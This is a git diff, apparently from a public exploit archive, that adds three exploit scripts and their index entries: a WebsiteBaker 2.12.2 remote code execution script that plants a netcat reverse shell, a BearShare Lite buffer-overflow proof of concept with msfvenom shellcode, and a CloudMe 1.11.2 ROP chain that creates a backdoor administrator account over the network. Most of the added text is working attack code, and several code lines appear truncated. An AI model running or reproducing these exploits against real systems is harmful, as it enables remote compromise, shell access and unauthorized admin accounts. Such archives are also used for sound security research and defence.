diff --git a/exploits/php/webapps/48838.py b/exploits/php/webapps/48838.py new file mode 100755 index 000000000..959ba4a6c --- /dev/null +++ b/exploits/php/webapps/48838.py @@ -0,0 +1,108 @@ +# Exploit Title: WebsiteBaker 2.12.2 - Remote Code Execution +# Date: 2020-07-04 +# Exploit Author: Selim Enes 'Enesdex' Karaduman +# Vendor Homepage: https://websitebaker.org/pages/en/home.php +# Software Link: https://wiki.websitebaker.org/doku.php/downloads +# Version: 2.12.2 +# Tested on: Windows 10 and Ubuntu 18.04 +# Note : You start listener before execute (e.g netcat) then procide listener ip and port + +import requests +import re +from bs4 import BeautifulSoup +import sys +import getopt + +options, remainder = getopt.gnu_getopt(sys.argv[1:], 'ht:u:p:i:l:',['lhost=','lport=']) + +for opt, arg in options: + if opt in ('-h'): + print('Usage: python exploit.py -t TARGET_URL -u USERNAME -p PASSWORD --lhost LISTENER_IP --lport LISTENER_PORT') + exit() + elif opt in ('-t'): + main_url = arg + elif opt in ('-u'): + usr = arg + elif opt in ('-p'): + passwd = arg + elif opt in ('-i', '--lhost'): + lhost = arg + elif opt in ('-l' , '--lport'): + lport = arg + +reverse_shell_code = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc"+" "+lhost+" "+lport +" "+">/tmp/f" +shell_code_eval = "echo system('"+ reverse_shell_code + "');" + + +print("Exploit Author: Selim Enes 'Enesdex' Karaduman" + " " + "@enesdex" + "\n") +##LOGIN PAGE HTML PARSE FOR LOGIN PARAMS +url = main_url+"/admin/login/index.php" +req = requests.get(url) + +login_page = req.text +soup = BeautifulSoup(login_page, 'html.parser') +username_par = soup.find_all(attrs={"type" : "hidden"})[1]['value'] +password_par = soup.find_all(attrs={"type" : "hidden"})[2]['value'] +weird_par = soup.find_all(attrs={"type" : "hidden"})[3]['name'] +weird_val = soup.find_all(attrs={"type" : "hidden"})[3]['value'] + +#LOGIN TO GET SESSIoN_COOKIE +login_page = requests.Session() + +burp0_url = main_url+"/admin/login/index.php" +burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} +burp0_data = {"url": '', "username_fieldname": username_par, "password_fieldname": password_par, weird_par : weird_val, username_par : usr, password_par : passwd, "submit": ''} +r = login_page.post(burp0_url, headers=burp0_headers, data=burp0_data,allow_redirects = False) + +cok = r.headers['Set-Cookie'] +cok = cok.split(' ')[0] +cookie_par = cok.split('=')[0] +cookie_val = cok.split('=')[1].replace(';','') +session_cookie = cookie_par + "=" + cookie_val + + +##ADD PAGE HTML PARSE FOR CREATE PAGE PARAMS +url = main_url+"/admin/pages/index.php" +cookies = {cookie_par : cookie_val} +req = requests.get(url, cookies=cookies) +create_page = req.text +soup = BeautifulSoup(create_page, 'html.parser') +weird_par1 = soup.find_all(attrs={"type" : "hidden"})[0]['name'] +weird_val1 = soup.find_all(attrs={"type" : "hidden"})[0]['value'] + +##Create Code Page to Put Shell Code +create_page = requests.session() + +burp0_url = main_url+"/admin/pages/add.php" +burp0_cookies = {cookie_par : cookie_val} +burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} +burp0_data = {weird_par1: weird_val1, "title": "exploit-shell", "type": "code", "parent": "0", "visibility": "public", "submit": "Add"} +c = create_page.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) + +##FIND THE PAGE ID +url = main_url+"/admin/pages/index.php" +cookies = {cookie_par : cookie_val} +req = requests.get(url, cookies=cookies) +find_id = req.text +soup = BeautifulSoup(find_id, 'html.parser') +pageid = soup.find_all('option',string='exploit-shell')[0]['value'] + +##HTML PARSE TO PUT SHELL CODE +url = main_url+'/admin/pages/modify.php?page_id='+pageid +cookies = {cookie_par : cookie_val} +req = requests.get(url, cookies=cookies) +add_shellcode = req.text +soup = BeautifulSoup(add_shellcode, 'html.parser') +weird_par2 = soup.find_all(attrs={"type" : "hidden"})[3]['name'] +weird_val2 = soup.find_all(attrs={"type" : "hidden"})[3]['value'] + +##ADD SHELL CODE +session = requests.session() + +burp0_url = main_url+"/modules/code/save.php" +burp0_cookies = {cookie_par : cookie_val} +burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} +burp0_data = {"page_id": pageid, "section_id": pageid, weird_par2: weird_val2, "content": shell_code_eval} +a = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) + +last_req = requests.get(main_url+"/pages/exploit-shell.php", cookies=cookies) \ No newline at end of file diff --git a/exploits/windows/local/48839.py b/exploits/windows/local/48839.py new file mode 100755 index 000000000..c55564fe3 --- /dev/null +++ b/exploits/windows/local/48839.py @@ -0,0 +1,40 @@ +# Title: BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC) +# Date: 2020-09-29 +# Author: Christian Vierschilling +# Vendor Homepage: http://www.bearshareofficial.com/ +# Software Link: http://www.oldversion.com.de/windows/bearshare-lite-5-2-5 +# Versions: 5.1.0 - 5.2.5 +# Tested on: Windows 10 x64 EN/DE +# CVE: NA + +# --- EXPLOTATION INSTRUCTIONS --- # +# 1. Adjust the values for "jmp_esp" and "shellcode" if needed +# 2. Run the script to generate a file pwn.txt, containing your payload +# 3. Open pwn.txt on your target (!!) (e.g. in the browser or locally) and copy the contents into the clipboard +# 4. Start BearShare, click on "Advanced..." and a new window will pop up. Put the payload from pwn.txt into the field "Keywords:" within the new window. Click on "Search" in this window and your payload will be executed. + +# --- PAYLOAD CONSTRUCTION --- # +#!/usr/bin/python +import binascii + +# Detected the offset for overwriting the EIP register using pattern_create and pattern_offset: [*] Exact match at offset 524 +junk1 = 524*"A" + +# Address for a JMP ESP instruction found in MSVBVM60.DLL using mona.py (You will probably need to adjust this if using another OS, language etc.) +# \x66\x06\x05\x35 +jmp_esp = binascii.unhexlify('35050666') + +# Using another 4 bytes to align the stack for clean shellcode execution +junk2 = 4*"B" + +# As we are limited to only being able to insert alphanumeric characters, we'll create an appropriate shellcode using msfvenom. Copy the output off the following command into the variable "shellcode" below: +# msfvenom -p windows/exec cmd=calc.exe BufferRegister=esp -e x86/alpha_mixed +shellcode = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8k2s0C0ePsPmYKUFQKpu4nk2ptpLKf26lLK3bTTNk1bexVoH7aZWVuaiollUl3QSLtBTlepyQZofmWqZgIrjRqBrwlKRrvpLK3zgLnkbl4Qt8hc3xc1HQv1lK2ya05QkcLK3ytXzCtzg9LKednkvaN6UaioNLzaZotM7qzgvXkPQeJVEScMIhWKQmq4T5xdChnkcha47qYCPfnkFlpKlKaHeLgqjsnk6dLKc1HPlI0Da4FDqKSkE1V9CjcaYoypcoaO0ZlKTRZKnm3msZ7qnmMUX230s05Pbpe8dqNkPoMWkO9EMkHpmenBcfU8MvnuMmMMKO9EelTFQlEZK0Ikm0puWumk1WuCD2PosZ7p1CyoxU3Se1bLbCDn55qhCUuPAA" + +# assemble payload +payload = junk1 + jmp_esp + junk2 + shellcode + +# write payload into pwn.txt +f = open("pwn.txt", 'w') +f.write(payload) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48840.py b/exploits/windows/local/48840.py new file mode 100755 index 000000000..b3fd3b476 --- /dev/null +++ b/exploits/windows/local/48840.py @@ -0,0 +1,319 @@ +# Exploit Title: CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR) +# Exploit Author: Bobby Cooke (boku) +# CVE: CVE-2018-6892 +# Date: 2020-09-29 +# Vendor Homepage: https://www.cloudme.com/ +# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe +# Version: 1.11.2 +# Tested On: Windows 10 (x64) - 10.0.19041 Build 19041 +# Script: Python 2.7 +# Notes: +# This exploit uses MSVCRT.System to create a new user (boku:0v3R9000!) and add the new user to the +# Administrators group. A requirement of successful exploitation is the CloudMe.exe process must be +# running as adminstrator, such as when ran with 'Run as Administrator'; as this permission is required +# to create new users on the system. This exploit has been tested against multiple Windows 10 systems +# including x86, x64, Pro, Education, Home; although there is no guarantee it will work in your CTF. + +# CloudMe 1.11.2 - Turing Complete Add-Admin ROP (DEP,ASLR) +import os,sys,socket,struct +from colorama import Fore, Back, Style + +F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] +B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE] +S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] +ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0] +err = S[3]+F[2]+'<========'+F[2]+'['+F[5]+'+++'+F[2]+'( '+F[0]+S[0] +def formatMsg(STRING): + return ok+S[3]+F[5]+STRING+S[0] +def formatErr(STRING): + return err+S[3]+F[2]+STRING+S[0] + +# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename +# ------------------------------------------------------------------------------------------------------- +# 0x69900000 | 0x69ac1000 | False | False | False | False | False | [Qt5Network.dll] +# 0x6eb40000 | 0x6eb64000 | False | False | False | False | False | [libgcc_s_dw2-1.dll] +# 0x68a80000 | 0x69055000 | False | False | False | False | False | [Qt5Core.dll] +# 0x00400000 | 0x00831000 | False | False | False | False | False | [CloudMe.exe] +# 0x6d9c0000 | 0x6da0c000 | False | False | False | False | False | [Qt5Sql.dll] +# 0x64b40000 | 0x64b5b000 | False | False | False | False | False | [libwinpthread-1.dll] +# 0x66e00000 | 0x66e3d000 | False | False | False | False | False | [Qt5Xml.dll] + +def getESP_RC(): + GaDG3Tz = [ + # ESP -> EDI + # Clobbers: BL # [EBX+5E5B10C4] must be writable # Requires ROPNOP + # Address=68F79000 Size=0007A000 (499712.) Owner=Qt5Core 68A80000 Section=.eh_fram Type=Imag 01001002 Access=RWE CopyOnWr + 0x68bb4678, # POP EBX # RETN [Qt5Core.dll] + 0x0A9C8F3C, # EBX + 0x5E5B10C4 = 0x68F7A000 = Writeable Memory + 0x68d5e818, # PUSH ESP # OR BL,DL # INC DWORD PTR DS:[EBX+5E5B10C4] # POP EDI # RETN 0x04 [Qt5Core.dll] + 0x68D50537, # RETN - ROPNOP + 0x68D50537 # RETN - ROPNOP + ] + print(formatMsg("Get ESP ROP Chain built!")) + return ''.join(struct.pack(' > CALL to LoadLibraryA + # $+4 > FileName = "msvcrt.dll" + # EAX = 0x512 = 1298 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFAEE, # NEG FFFFFAEE = 0x512 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EDI + EAX = End of string "msvcrt.dll" + 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] + # EAX = 0x01 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EAX = 0x0 + 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] + # ECX = 0x0 + 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] + # Terminate String "msvcrt.dll" + 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) + 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) + 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] + # EAX = -0xA = 0xFFFFFFF6 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFF6, # -0xA + # ESI = Start of string "msvcrt.dll\x00" + 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] + # EAX = PTR LoadLibraryA (from CloudMe Import Table) + # CloudMe Address=0081A168 Section=.idata Type=Import (Known) Name=KERNEL32.LoadLibraryA + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFF7E5E98, # NEG FF7E5E98 = 0081A168 = PTR Kernel32.LoadLibraryA + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EAX = kernel32.LoadLibraryA + 0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll] + # ESI = kernel32.LoadLibraryA # EAX = Addr string "msvcrt.dll\x00" + 0x68d50536, # XCHG EAX,ESI # RETN [Qt5Core.dll] + # For PUSHAD we need: EDI=FarRETN # ESI=&LoadLibraryA # EAX=["msvcrt.dll"] # ECX=ROPNOP + 0x68d32800, # POP ECX # RETN [Qt5Core.dll] + 0x68D50537, # RETN - ROPNOP + 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] + 0x6990F972, # RETN 10 [Qt5Network.dll] + 0x68f7bc5e, # pushad # ret # [Qt5Core.dll] + # EAX -> EBP = msvcrt.dll + 0x68cc462c # XCHG EAX,EBP # RETN [Qt5Core.dll] + # EBP = msvcrt.dll + ] + print(formatMsg("LoadLibraryA(LPSTR \"msvcrt.dll\") ROP Chain built!")) + return ''.join(struct.pack(' > CALL to GetProcAddress # EDX (ROPNOP) + # $+4 > hModule = [msvcrt] # ECX + # $+8 > ProcNameOrOrdinal (system) # EAX + # EAX = 0x4a2 = 1186 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFB5E, # NEG FFFFFB5E = 0x4A2 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EDI + EAX = End of string "system" + 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] + # EAX = 0x01 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EAX = 0x0 + 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] + # ECX = 0x0 + 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] + # Terminate String "system" + 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) + 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) + 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] + # EAX = -0x6 = 0xFFFFFFFA + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFFA, # -0x6 + # ESI = Start of string "system\x00" + 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] + 0x68fcf58d, # DEC EBP # RETN [Qt5Core.dll](fix EBP for prev gadgets) + # EAX = PTR GetProcAddr (from CloudMe Import Table) + # CloudMe Address=0081A148 # Section=.idata # Type=Import # Name=KERNEL32.GetProcAddress + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFF7E5EB8, # NEG FF7E5EB8 = 0081A148 = PTR Kernel32.GetProcAddr + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + 0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll] + 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] + 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] + # ESI = &kernel32.GetProcAddr # ECX=["system\x00"]# EBP=msvcrt.dll + # For PUSHAD we need: EDI=FarRETN # ESI=&GetProcAddress # ECX=msvcrt.dll # EAX=["system"]# EDX=ROPNOP + # EBP -> EAX = msvcrt.dll + 0x68cc462c, # XCHG EAX,EBP # RETN [Qt5Core.dll] + # ECX=&msvcrt.dll # EAX=["system\x00"] + 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] + # EDX=ROPNOP + 0x68f94685, # POP EDX # RETN [Qt5Core.dll] + 0x68D50537, # RETN - ROPNOP + # EDI=FarRETN + 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] + 0x699010B4, # ret 0C [Qt5Network.dll] + # KERNEL32.GetProcAddress [ESI pushed to stack] + # [EBP pushed to stack] + # [ESP pushed to stack] + # [EBX pushed to stack] +# land after ret 0xC -> Qt5Core.68D50537 (ROPNOP) [EDX pushed to stack] + # MSVCRT.75F60000 [ECX pushed to stack] + # ASCII "system" [EAX pushed to stack] + 0X68f7bc5e, # pushad # ret # [Qt5Core.dll] + 0x68b1df17 # XCHG EAX,EDX # RETN # [Qt5Core.dll] + # EDX = msvcrt.system + ] + print(formatMsg("GetProcAddress(HMODULE msvcrt, LPCSTR system) ROP Chain built!")) + return ''.join(struct.pack(' > CALL to system + # $+4 > command = "net user boku 0v3R9000! /add" + # EAX = 0x438 = 1080 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFBC8, # NEG 0xFFFFFBC8 = 0x438 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EDI + EAX = End of string "net user..." + 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] + # EAX = 0x01 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EAX = 0x0 + 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] + # ECX = 0x0 + 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] + # Terminate String "net user..." + 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) + 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) + 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] + # EAX = -28 = -0x1C = 0xFFFFFFE4 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFE4, # -28 = -0x1C + # ESI = Start of string "net user...\x00" + 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] + # EDX = MSVCRT.system # ECX=0x0 + # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net user.."] # ECX=POP+RET + 0x68d32800, # POP ECX # RETN [Qt5Core.dll] + 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] + # ESI = MSVCRT.system # EAX = ["net user.."] + 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] + 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] + # EDI=FarRETN + 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] + 0x6990F972, # RETN 10 [Qt5Network.dll] + # PUSHAD - Setup Call to MSVCRT.system on stack + 0X68f7bc5e # pushad # ret # [Qt5Core.dll] + ] + print(formatMsg("system(const char* \"net user boku 0v3R9000! /add\") ROP Chain built!")) + return ''.join(struct.pack(' EDX + 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] + 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] + # EAX = 0x3F7 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFC09, # NEG 0xFFFFFC09 = 0x3F7 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EDI + EAX = End of string "net local..." + 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] + # EAX = 0x01 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EAX = 0x0 + 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] + # ECX = 0x0 + 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] + # Terminate String "net local..." + 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) + 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) + 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] + # EAX = -39 = -0x27 = 0xFFFFFFE4 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFD9, # -39 = -0x27 + # ESI = Start of string "net local...\x00" + 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] + # EDX = MSVCRT.system # ECX=0x0 + # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net local.."] # ECX=ROPNOP + 0x68d32800, # POP ECX # RETN [Qt5Core.dll] + 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] + # ESI = MSVCRT.system # EAX = ["net local.."] + 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] + 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] + # EDI=FarRETN + 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] + 0x6990F972, # RETN 10 [Qt5Network.dll] + # PUSHAD - Setup Call to MSVCRT.system on stack + 0X68f7bc5e # pushad # ret # [Qt5Core.dll] + ] + print(formatMsg("system(const char* \"net localgroup Administrators boku /add\") ROP Chain built!")) + return ''.join(struct.pack(' ___ | | .--.\n" + SIG += F[4]+" | |.' ,'-'"+F[2]+"* *"+F[4]+"'-. |/ /__ __\n" + SIG += F[4]+" | ) "+F[2]+" * *"+F[4]+" / \\ \\\n" + SIG += F[4]+" |____..- '-.._..-'_|\\___|._..\\___\\\n" + SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0] + return SIG + +def footer(): + foot = formatMsg('Requires that the Cloudme program is ran using \'Run As Administrator\'\n') + return foot + +if __name__ == "__main__": + print(header()) + print(sig()) + print(footer()) + if len(sys.argv) != 3: + print(formatErr("Usage: python %s " % sys.argv[0])) + print(formaterr("Example: python %s '127.0.0.1' 8888" % sys.argv[0])) + sys.exit(-1) + host = sys.argv[1] + port = int(sys.argv[2]) + + rop_chain = getESP_RC() + msvcrt_rop_chain() + getESP_RC() + GetProc_system_rop_chain() + getESP_RC() + addUsr_rop_chain() + getESP_RC() + addAdm_rop_chain() + + os_EIP = '\41'*1052 + os_nSEH = '\x41'*(2344-len(os_EIP + rop_chain)) + nSEH = '\x42'*4 + SEH = '\x43'*4 + buff = os_EIP + rop_chain + os_nSEH + nSEH + SEH + + term = '\r\n' + kern32 = 'msvcrt.dll'+'AAAAAA' + winExe = 'system'+'BBBBBB' + addUsr = 'net user boku 0v3R9000! /add'+'CCCC' + addAdm = 'net localgroup Administrators boku /add'+'DDDD' + rmdr = '\x44'*(3854-len(buff)-len(kern32)-len(winExe)-len(addAdm)) + payload = buff + kern32 + winExe + addUsr + addAdm + rmdr + term + + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((host,port)) + print(formatMsg( "Successfully connected to "+host+" on port "+str(port))) + resp = sendRecv(sock,payload) + print(formatMsg("Closing Socket")) + sock.close() + print(formatErr("Exiting python script.")) + except: + print(formatErr("Failed to connect and send payload.")) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f1b3b15d7..a7e3567d3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10384,6 +10384,8 @@ id,file,description,date,author,type,platform,port 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows, 48821,exploits/windows/local/48821.txt,"ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path",2020-09-21,"Burhanettin Ozgenc",local,windows, 48836,exploits/windows/local/48836.c,"MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation",2020-09-28,"Matteo Malvica",local,windows, +48839,exploits/windows/local/48839.py,"BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)",2020-09-29,"Christian Vierschilling",local,windows, +48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, @@ -40661,6 +40663,7 @@ id,file,description,date,author,type,platform,port 48834,exploits/multiple/webapps/48834.txt,"B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure",2020-09-25,LiquidWorm,webapps,multiple, 48835,exploits/hardware/webapps/48835.py,"Mida eFramework 2.8.9 - Remote Code Execution",2020-09-28,elbae,webapps,hardware, 48837,exploits/multiple/webapps/48837.txt,"Joplin 1.0.245 - Arbitrary Code Execution (PoC)",2020-09-28,"Ademar Nowasky Junior",webapps,multiple, +48838,exploits/php/webapps/48838.py,"WebsiteBaker 2.12.2 - Remote Code Execution",2020-09-29,Enesdex,webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,